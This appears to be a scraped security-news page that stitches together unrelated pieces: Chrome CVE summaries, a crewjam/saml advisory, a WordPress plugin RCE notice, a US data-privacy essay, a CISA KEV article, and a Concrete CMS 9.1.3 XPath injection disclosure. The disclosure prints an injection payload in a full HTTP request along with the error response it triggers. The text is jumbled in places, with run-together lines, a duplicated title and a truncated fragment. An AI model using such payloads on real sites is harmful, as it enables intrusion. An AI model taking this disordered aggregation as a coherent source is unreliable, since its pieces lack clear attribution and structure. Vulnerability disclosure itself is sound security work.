Insufficient policy enforcement in Autofill in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to bypass autofill restrictions via a crafted HTML page. (Chromium security severity: Medium)

CVE-2022-4184

Use after free in Sign-In in Google Chrome prior to 108.0.5359.71 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via profile destruction. (Chromium security severity: Medium)

CVE-2022-4191

Insufficient policy enforcement in Safe Browsing in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to bypass Safe Browsing warnings via a malicious file. (Chromium security severity: Medium)

CVE-2022-4195: Stable Channel Update for Desktop

Insufficient policy enforcement in DevTools in Google Chrome prior to 108.0.5359.71 allowed an attacker who convinced a user to install a malicious extension to bypass navigation restrictions via a crafted Chrome Extension. (Chromium security severity: Medium)

CVE-2022-4189

Insufficient policy enforcement in DevTools in Google Chrome on Windows prior to 108.0.5359.71 allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (Chromium security severity: Medium)

CVE-2022-4187

### Impact

The crewjam/saml go library is vulnerable to an authentication bypass when processing SAML responses containing multiple Assertion elements.

### Patches

This issue has been corrected in version 0.4.9

### Credit

This issue was reported by Felix Wilhelm from Google Project Zero.


**crewjam/saml vulnerable to signature bypass via multiple Assertion elements due to improper authentication**

Critical severity GitHub Reviewed Published Nov 29, 2022 in crewjam/saml • Updated Nov 29, 2022

GHSA-j2jp-wvqg-wc2g: crewjam/saml vulnerable to signature bypass via multiple Assertion elements due to improper authentication

The Ultimate Member plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 2.5.0 via the get_option_value_from_callback function that accepts user supplied input and passes it through call_user_func(). This makes it possible for authenticated attackers, with administrative capabilities, to execute code on the server.

CVE-2022-3383: Changeset 2805393 for ultimate-member – WordPress Plugin Repository

A lack of federal regulatory legislation leaves US privacy concerns to battle for attention with other business priorities.

Over the past 15 years, several events have reshaped how we think about data — what it means from a business perspective and what rights individuals have regarding how their personal information is used. Data security governance undoubtedly will play a large role in the future; however, conversations are still in relatively early stages. 

In 2016, when European regulators created the General Data Protection Regulation (GDPR) as a legislative framework that clearly mandates rules and fines, a fundamental shift occurred that elevated privacy to a board-level discussion. This resulted in CEOs taking part in the conversation while empowering the C-suite to make more decisions. 

Next, the data culture quickly evolved from one of implicit trust (where organizations freely used data without much restriction) to limiting risk (controlling data access based on regulations and customer feedback). While the data protection industry in Europe has made great strides since GDPR came into existence, we still have a long way to go because, for decades, technology solutions were built without privacy in mind. 

In the United States, the picture is quite different, as the lack of federal regulatory legislation leaves privacy concerns to battle for attention with other business priorities. Let's dig deeper into what the future of data privacy looks like across the pond. 

**Beyond Cookies: Delving Beneath the Data Veneer**

Marketplaces built around selling data need to pivot, because the future is about protecting individual data rights and that change goes far beyond a website pop-up asking to approve the use of cookies. Historically, data brokers have cashed in on users' data, which precipitated state laws in Vermont and California that aim to protect consumers by identifying the brokers and determining how they use the information. 

Tech giants like Apple and Google have also increased privacy protections with app-tracking transparency and plans to phase out third-party cookies. These titans of industry are pioneering an important movement that other companies need to follow. There's hope that legislation may spark further change, especially with privacy receiving bipartisan support.

If the American Data Privacy and Protection Act (ADPPA) takes effect in the United States, the biggest win would be a common standard for how to handle data. States like California have already established stricter standards for data privacy through the California Consumer Privacy Act (CCPA). Compliance requirements and hefty fines would be important accelerators in protecting consumer data. 

**Privacy Needs Security **

A comprehensive data security strategy is essential and a prerequisite to an overall privacy-centric posture for data-driven organizations. It's imperative to implement scalable, fine-grained access controls so policies can keep the data safe in the first place.

As the pendulum shifts toward implementing broader and complete data security strategies, companies need to adjust. The work of chief information security officers (CISOs), chief data officers (CDOs), and chief information officers (CIOs) alongside their actions is more critical than ever, because they are responsible for implementing tools and processes that help align companies toward their privacy-related goals. The increased focus on a complete data security strategy applies to data-driven organizations of any size. 

A Cisco study cites that 92% of organizations claim privacy to be integral to their culture, but it comes with a technical challenge. Oftentimes, CISOs and CIOs are confronted with data spread across their organization and they need to gain visibility into all their siloed, heterogeneous data to understand who controls, maintains, processes, and accesses which parts of the data. 

This challenge is exacerbated by the need to modernize with cloud-native technologies so companies have a better understanding of how data is used and that it is used in accordance with privacy guidelines, principles, and any governing legislation. 

**A Look into the Future**

None of this happened by accident. Consumers didn't like data collection practices and they spoke up. Legislators heard from their constituents and started creating regulations like the ADPPA. Companies started serving consumers differently and taking data privacy seriously.

Consumer awareness of how data is collected and used is becoming mainstream. According to HubSpot's "2022 State of U.S. Consumer Trends Report," 80% of consumers consider data privacy a human right and believe individuals should have complete control over how companies use their data. As a result of these growing trends, more businesses should leverage privacy as a differentiator. 

There is still a gap between companies' intent to satisfy data privacy concerns and the action that protects that information. As consumers become better educated about how their data is used, and legislation inches closer to reality, it becomes even more critical. Making the right investments in data security provides visibility, access control, and insights into your data while ensuring compliance, and can help make all the difference.

Why the Culture Shift on Privacy and Security Means Today's Data Looks Different

Concrete CMS version 9.1.3 suffers from an XPATH injection vulnerability.

## Title: concretecms-9.1.3 Xpath injection## Author: nu11secur1ty## Date: 11.28.2022## Vendor: https://www.concretecms.org/## Software: https://www.concretecms.org/download## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3## Description:The URL path folder `3` appears to be vulnerable to XPath injection attacks.The test payload 50539478' or 4591=4591-- was submitted in the URLpath folder `3`, and an XPath error message was returned.The attacker can flood with requests the system by using thisvulnerability to untilted he receives the actual paths of the allcontent of this system which content is stored on some internal orexternal server.## STATUS: HIGH Vulnerability[+] Exploits:00:```GETGET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/jsHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```[+] Response:```HTTPHTTP/1.1 500 Internal Server ErrorDate: Mon, 28 Nov 2022 15:32:22 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Connection: closeContent-Type: text/html;charset=UTF-8Content-Length: 592153<!DOCTYPE html><html>  <head>    <meta charset="utf-8">    <meta name="robots" content="noindex,nofollow"/>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no"/>    <title>Concrete CMS has encountered an issue.</title>    <style>body {  font: 12px "Helvetica Neue", helvetica, arial, sans-serif;  color: #131313;  background: #eeeeee;  padding:0;  margin: 0;  max-height: 100%;  text-rendering: optimizeLegibility;}  a {    text-decoration: none;  }.Whoops.container {    position: relative;    z-index: 9999999999;}.panel {    overflow-y: scroll;    height: 100%;    position: fixed;    margin: 0;    left: 0;    top: 0;}.branding {  position: absolute;  top: 10px;  right: 20px;  color: #777777;  font-size: 10px;    z-index: 100;}  .branding a {    color: #e95353;  }header {  color: white;  box-sizing: border-box;  background-color: #2a2a2a;  padding: 35px 40px;  max-height: 180px;  overflow: hidden;  transition: 0.5s;}  header.header-expand {    max-height: 1000px;  }  .exc-title {    margin: 0;    color: #bebebe;    font-size: 14px;  }    .exc-title-primary, .exc-title-secondary {      color: #e95353;    }    .exc-message {      font-size: 20px;      word-wrap: break-word;      margin: 4px 0 0 0;      color: white;    }      .exc-message span {        display: block;      }      .exc-message-empty-notice {        color: #a29d9d;        font-weight: 300;      }.......```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)## Proof and Exploit:[href](https://streamable.com/4f60ka)## Time spent`03:00:00`

Concrete CMS 9.1.3 XPATH Injection

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a critical flaw impacting Oracle Fusion Middleware to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation.
The vulnerability, tracked as CVE-2021-35587, carries a CVSS score of 9.8 and impacts Oracle Access Manager (OAM) versions 11.1.2.3.0, 12.2.1.3.0, and 12.2.1.4.0.
<!-

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a critical flaw impacting Oracle Fusion Middleware to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation.

The vulnerability, tracked as CVE-2021-35587, carries a CVSS score of 9.8 and impacts Oracle Access Manager (OAM) versions 11.1.2.3.0, 12.2.1.3.0, and 12.2.1.4.0.

Successful exploitation of the remote command execution bug could enable an unauthenticated attacker with network access to completely compromise and take over Access Manager instances.

"It may give the attacker access to OAM server, to create any user with any privileges, or just get code execution in the victim's server," Vietnamese security researcher Nguyen Jang (Janggggg), who reported the bug alongside peterjson, noted earlier this March.

The issue was addressed by Oracle as part of its Critical Patch Update in January 2022.

Additional details regarding the nature of the attacks and the scale of the exploitation efforts are immediately unclear. Data gathered by threat intelligence firm GreyNoise shows that attempts to weaponize the flaw have been ongoing and originate from the U.S., China, Singapore, and Canada.

Also added by CISA to the KEV catalog is the recently patched heap buffer overflow flaw in the Google Chrome web browser (CVE-2022-4135) that the internet giant acknowledged as having been abused in the wild.

Federal agencies are required to apply the vendor patches by December 19, 2022, to secure networks against potential threats.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google